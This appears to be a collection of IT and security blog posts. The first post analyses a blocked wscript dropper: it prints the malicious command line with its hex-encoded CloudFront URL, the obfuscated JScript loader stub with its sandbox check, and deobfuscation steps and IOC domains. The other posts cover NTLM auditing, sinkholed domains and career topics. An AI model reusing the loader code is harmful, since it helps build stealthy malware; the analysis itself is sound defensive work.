Examining strange wscript behavior

We use cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently:

wscript.exe "C:\ProgramData{18E0DD83-92A2-5745-1464-C9078E2642C9}\domo.txt" "68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk"

I took a copy of the domo.txt script and uploaded to VT:

I also ran that hex string through a hex decoder:

68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e = https://d274eq41c39r2n.cloudfront.net

According to the wscript documentation, the flag /e:jscript will allow the wscript interpreter to run the file domo.txt as jscript. The contents appear encoded or obfuscated. The /b argument will make it run noninteractively. I’m assuming the –iserik is passed to the subsequent script?

strings:

*/function fySxqeCS(){var SYBkWxQw=WScript;var uDoH="";if(SYBkWxQw.Arguments.length>0&&SYBkWxQw.Arguments(SYBkWxQw.Arguments.length-1).charAt(7) == 'k')uDoH="66 
320".toString();var IMA="";var XltLF=0;while(XltLF<uDoH.length){IMA+=String.fromCharCode(parseInt(uDoH.substr(XltLF,2),1
6));XltLF+=2;XltLF+=IMA.charCodeAt(IMA.length-1)%4}(new Function(IMA))()}fySxqeCS();/*

Googling a bit finds a BAH article classifying this as APA. It looks pretty much identical. The article doesn’t decode the script so maybe I can find out a bit more…

I tried using FlareVM run it interactively with a debugger, but that didn’t prove as easy as running the contents through node.js. Maybe I’ll come back to that later.

Let’s look at the contents:

Wait, is that a /* at the beginning? Let’s see if there’s a closing comment

Yep, sure enough. If you look for the complimentary */ you’ll see this:

¯áЫçéË*/function fySxqeCS()

Getting closer, there’s a comment towards the end as well. After removing them, it looks like this:

Which is still suboptimal. Next, we copy to a new file & rename to .js. Sublime text takes care of prettifying it a bit for us.

Starting to look readable

The argument uDoH is still quite obfuscated, and it looks like there’s some decoding function. The malware authors have also tried to prevent this code from running in a sandbox (it expects to run in WScript and with an argument of ‘k’ at the 8th position (part of –IsErik). That can be commented out for further analysis.

In addition, it looks like it runs the subsequent decoded output in a variable called IMA. That function call needs to be removed & instead we print the contents to the console. Here’s almost how it looks. The uDoH had to be trimmed quite a bit to fit in this textbox:

function fySxqeCS() {
// var SYBkWxQw = WScript;
var uDoH = "";
//if (SYBkWxQw.Arguments.length > 0 && SYBkWxQw.Arguments(SYBkWxQw.Arguments.length - 1).charAt(7) == 'k')
uDoH = "66 ¦75 2c7abü2829œ7c7c65æ2822 22é 29ï29 29ô2c65£2822 ý22Êö29ƒ7dè63ß9™61Ì74 <SNIPPED> 9Æ7bº€ÿ65 2822„¶22§å29 7d 7d 4d 61Ã69 6eb52829é3b Á320".toString();
var IMA = "";
var XltLF = 0;
while (XltLF < uDoH.length) {
IMA += String.fromCharCode(parseInt(uDoH.substr(XltLF, 2), 16));
XltLF += 2;
XltLF += IMA.charCodeAt(IMA.length - 1) % 4
}
console.log(IMA)
//(new Function(IMA))()
}
fySxqeCS();
node initial.js > initial2.js
Still some obfuscation, but much better than the original source

Ok now we’re getting somewhere. I’m going to try to run it through some sort of callgraph visualization.

Looks like they’re all in use

Ok so we need to step through these & rename them so we better understand what’s happening.

Function f looks like some sort of decoding function, let’s run it:

function f(b) 
{
b = b.toString();
console.log(b)
for (var a = "", c = 0; c < b.length; c += 2) a += String.fromCharCode(parseInt(b.substr(c, 2), 16));
console.log(a)
return a
}
u();
node e.js 
536372697074696e672e46696c6553797374656d4f626a656374
Scripting.FileSystemObject

I’ll rename that function to DecodeString and re-run the callgraph visualization:

Lots of DecodeString called here

It looks like this is about the limit of my knowledge.. I’m going to try to analyze it a bit more, but for now I’m satisfied that it’s malicious. What I need to find are some specific IOCs and generate some GRR flows / splunk queries to search for these IOCs.

Update: f5d599a39d02caef1984e95fdc606f838893ffc5.xyz

Unfortunately, as of 16 April 2019, I’m still seeing traffic on this domain.

Here are some others I’m seeing:

dfbfb63dcaff96fbe9616fb806e4799f.com
8d46980d994cc618aeed127df1b5c86d8acd86ce.info
07bf396c25d9a624281c97752aee0247e4229b84.xyz
07bf396c25d9a624281c97752aee0247e4229b84.com
07bf396c25d9a624281c97752aee0247e4229b84.info
d234304f57772cf6be78ab6c24a65c91ce896fff.xyz
d234304f57772cf6be78ab6c24a65c91ce896fff.com
d234304f57772cf6be78ab6c24a65c91ce896fff.info
8d46980d994cc618aeed127df1b5c86d8acd86ce.xyz
cbb0c7dae8061aca012b8a910062c33f3642e383.com
cbb0c7dae8061aca012b8a910062c33f3642e383.xyz
cbb0c7dae8061aca012b8a910062c33f3642e383.info

Disabling NTLM

NTLM auditing in an active directory domain with splunk.

If you want to disable NTLM and move to Kerberos in an active directory environment, you’ll need to follow this process.

  1. Enable auditing (covered in this post)
  2. Reconfigure applications to use Service Principal Name (SPN)
  3. Whitelist allowed NTLM servers
  4. Configure blocking

The first step is to enable auditing on your domain controllers. The easiest way is by creating a GPO and applying it to an OU containing your DC’s. Here’s what mine looks like:

Once defined, use splunk (or other) to capture all logs created here:

Applications and Services Logs -> Microsoft -> Windows -> NTLM -> Operational

My splunk inputs.conf looks like this:

 [WinEventLog://Microsoft-Windows-NTLM/Operational]
disabled = 0
index = msad
Splunk Query:
index=msad sourcetype="WinEventLog:Microsoft-Windows-NTLM/Operational

f5d599a39d02caef1984e95fdc606f838893ffc5.xyz

I’m now the proud owner of these domains:

Why would I purchase such strange looking domains you ask?

It all started long ago, while working for my enterprise. I saw some activity flagged by OpenDNS / Umbrella for some CnC traffic bound for these domains. It was being blocked but as I dug a little deeper I noted that they weren’t registered to anyone.

So, I figured, let’s register them & see what tries to connect….

Fast forward a few hours & login to an ec2 instance running apache. I noticed it felt a little ‘slow’ but it didn’t appear to be cpu-bound. I ran a netstat command and saw a crapload of connections to 443. So, I registered a letsencrypt certificate & watched my logs start to fill up:

62.xx.xx.xx - - [15/Mar/2019:20:16:21 +0000] "POST /v1/users/tokens/renew HTTP/1.1" 404 219 "-" "NordApp android (playstore/3.11.3) Android 9"
107.xx.xx.xx - - [15/Mar/2019:20:16:21 +0000] "GET /v1/servers/count HTTP/1.1" 404 214 "-" "NordVPN/78 CFNetwork/902.3.1 Darwin/17.7.0 (x86_64)"
82.xx.xx.xx - - [15/Mar/2019:20:16:21 +0000] "POST /v1/users/tokens/renew HTTP/1.1" 404 219 "-" "NordApp android (playstore/3.11.3) Android 9"
80.xx.xx.xx - - [15/Mar/2019:20:16:21 +0000] "POST /v1/users/tokens/renew HTTP/1.1" 404 219 "-" "NordApp android (sideload/3.11.3) Android 5.1.1"
185.xx.xx.xx - - [15/Mar/2019:20:16:21 +0000] "GET /v1/servers?fields%5Bservers.id%5D=&fields%5Bservers.load%5D=&filters%5Bservers.status%5D=online&limit=5402 HTTP/1.1" 404 208 "-" "NordVPN/78 CFNetwork/760.9 Darwin/15.6.0 (x86_64)"
77.xx.xx.xx - - [15/Mar/2019:20:16:21 +0000] "POST /v1/users/tokens/renew HTTP/1.1" 404 219 "-" "NordApp android (playstore/3.11.3) Android 9"
185.xx.xx.xx - - [15/Mar/2019:20:16:21 +0000] "POST /v1/users/tokens/renew HTTP/1.1" 404 219 "-" "NordApp android (playstore/3.11.2) Android 8.0.0"

Clearly, this is traffic that is not intended for me. I reached out to NordVPN security & received a response that they’re looking into it.

My curiosity is around what could have caused this? Misconfiguration? I sandboxed the 3.11.3 version of NordVPN but wasn’t able to reproduce this issue.

This was / is no joke, here’s the utilization according to AWS:

I’m curious if others are seeing this on their networks and what the root cause is.

choose your own identity






I’ve been working with my team to come up with some visionary thoughts around where we think our services will be in the next 3-5 years.  In addition to the typical CMMI-speak, we did come up with a few ideas that I think are revolutionary from a corporate IT perspective.  The one term I came up with is “choose your own identity” which is basically the idea that one can choose to use their facebook or twitter account for access to corporate resources.  There are a number of implications to this, but here’s basically how it would work: 

  1. User is provisioned in HR system (workday/etc)
  2. Employee starts work, logs in to HR system
  3. Employee associates their externally managed credential to their Employee ID
  4. Employee is able to login to Corporate resources

This idea is not new in the world of Internet services, but it would be new to corporations which are used to controlling a user’s identity.  It would also require that certain false security controls are in place (password length, change history, complexity, etc).  I think the credential would be enhanced by a second factor – for example, we are thinking about issuing certificates to every user, and every device, in order to restrict access to the system.  In addition, data protection becomes more of a hard requirement through the use of DRM or other encryption.

i know nothing

Let me just begin by saying that I don’t know anything.  There, I said it.  And I truly believe it.  The more I learn, the more I realize I don’t know shit.


Now that I’ve gotten that off my chest, let me talk a little about some things I do know, and I’m OK at (read: not GOOD at, just OK).  I’m OK at reading comprehension, and I’m OK at spelling.  I’m also good at being curious, but that seems more like an innate ability.  I suspect most people in my profession have the same innate curiosity – we all used to take things apart as kids (and much to our parents’ chagrin, not put them back together).


The DefCon 101 talks were excellent, and got me thinking about level setting.  Lostboy gave a talk about baselining knowledge in IT, and I thought I would contribute some of my thoughts.


I have the opportunity in my position to interview people for jobs in IT, including systems administration, network administration, and security.  I often am disappointed in the candidates’ lack of basic knowledge of how systems are put together.


Again, I don’t claim to know anything, but here are some basic things that I always ask candidates.  My belief (and it could be unfounded) is that if you’re going to be in IT, you should know the answers to these questions.  Especially if you’re interviewing for a sysadmin position.


1. How does DNS work?


The answer can be as simple as, well, it maps names to IP addresses, which is true.  But there is so much more to it.  I don’t claim to be a DNS master, or anything like that – I don’t know crap about the inner workings.  However, I do know, and I expect EVERYONE in IT to know what an “A” record is.  If you don’t know, look it up.  Look up what a “PTR” record is while you’re at it, and a CNAME record too.  These are SIMPLE things that you should know if you’re coming to an interview as an IT person.


2. How does DHCP work?


Again, a simple question, with a simple answer.. it assigns IP addresses dynamically.  However, the a real IT person will know HOW DHCP works – the host sends a broadcast message and the DHCP server responds.  If it’s not on the same layer 2 domain (look it up), the router will forward the DHCP request on to the DHCP server if it is configured to do so.


If you want to even think about getting into security as a profession, you should know much more about the above protocols.  Down to specifics on what the packets look like and how to manipulate the protocols to ‘trick’ hosts.


Anyone who interviews for a networking position on my team had better know much more about these protocols than the basics, and they will need to know about other things that are pervasive in today’s networks.  Things like:


1. MTU and Path MTU discovery


What is the MTU?  How does Path MTU discovery work?


2. How does traceroute work?


Not “it traces the route between points on a network”, rather, HOW does this protocol work?  For extra credit, how does a UNIX machine differ from a Windows machine in how it performs the traceroute utility?  And no, the answer isn’t “Windows uses tracert, and UNIX uses traceroute”.


Those of you who are reading this post because you googled my name after seeing that I’ll be interviewing you tomorrow, good on you for doing a little research before coming to the interview.  Just be prepared.

Giving Back

I went to DefCon 2012 this year for the first time ever and I must say that it was a great experience.  I met too many people to count, and learned a good deal about some security topics.  I also learned some information about password hashes, which is fantastic b/c it’s some timely information with all of the news recently about hashes being leaked.

I’ll post more about that as the material becomes available online.  If you live in San Diego and want to meet to discuss security topics, drop me a line, I’d love to meet up.  My twitter handle is niemesrw.


I have been listening to Exotic Liability for the past few months – the guys on there are a fantastic resource for those of you who are interested in computer security.  Their expertise in penetration testing is unparalleled, and they have some interesting guests on as well.  Plus, unlike some podcasts, they’re not trying to sell you anything.


Anyway, my re-entry to the security field has left me wondering how I can give back to the community.  I have a lot of expertise in corporate IT, networking, and systems, and I believe this gives me a good window from which to view security in a big-picture sense.  The bottom line for most of us is we’re all strapped for resources, so the ‘next big thing’ is sure to only cause us more headaches since it won’t have anyone to manage it.  It got me thinking about some recent projects I have at work – we’ve already got some web services but we will be adding more as time goes on.  Some of which will have access to not just products we’re offering customers, but some of our enterprise applications.  This got me thinking about how to best secure these applications.  The old adage of putting a server in the DMZ is over.  We have all of these technology solutions to choose from now as well – web-application firewalls, reverse proxies, etc.  Nothing, however, compares to actually implementing a real security program that your developers follow.


The guys over at OWASP are a tremendous resource for how to implement secure web applications.  They tell us that one of the most important things we can do is to perform a risk analysis.  What data will the application have access to?  And what are the risks of compromise?  Only then can you associate controls to help mitigate the risk, and some of these controls are very basic and non-technological.  You need some sort of secure development program, and a security testing program.  Technical measures, like WAFs, can be defeated, but writing secure applications are much more difficult to defeat.


Anyway, I ramble, and it’s been a long week already.  I hope this is just the first in a series of posts!  But we all know how that goes in the blogger world.

The First 90 Days

The First 90 Days

I recently started a new job and have been considering what to implement during the first period of my tenure.  The following are my restrictions / requirements:

  • No budget
  • Services must fit in a VM
  • Scalable (read: easily supported / maintained)

With that in mind, I’ve decided to implement a few things:

  • syslog-ng syslog repository
  • rancid

Syslog-NG is a great syslog server replacement, and there are a number of great management / reporting tools as well.  It’s “free” and fits easily in a standard U*IX environment.

I’ll also be installing LogZilla (aka php-syslog-ng) and putting everything in a mysql database.

RANCID is a fantastic tool that will archive your network configurations & let you know if things have changed.  Some folks have integrated the CVS repository that RANCID uses with CVSWEB, so I’ll be looking into that as well.

Ok, that’s nice, but what does that have to do with the CCDE?

Nothing directly, but it does have everything to do with the care & feeding of a network.  You can’t know what’s going on with your devices without consolidating the messages they are producing, and without configuration backups / auditing you can be in trouble if a system loses its configuration or is changed.

The syslog-ng design will probably involve a hierarchy of some sort, where each site has a local repository, and all of these feed back to a central server that is being backed up.  I don’t really know yet, but syslog-ng gives you the freedom to do so.

How about a pretty picture?  I like pretty pictures: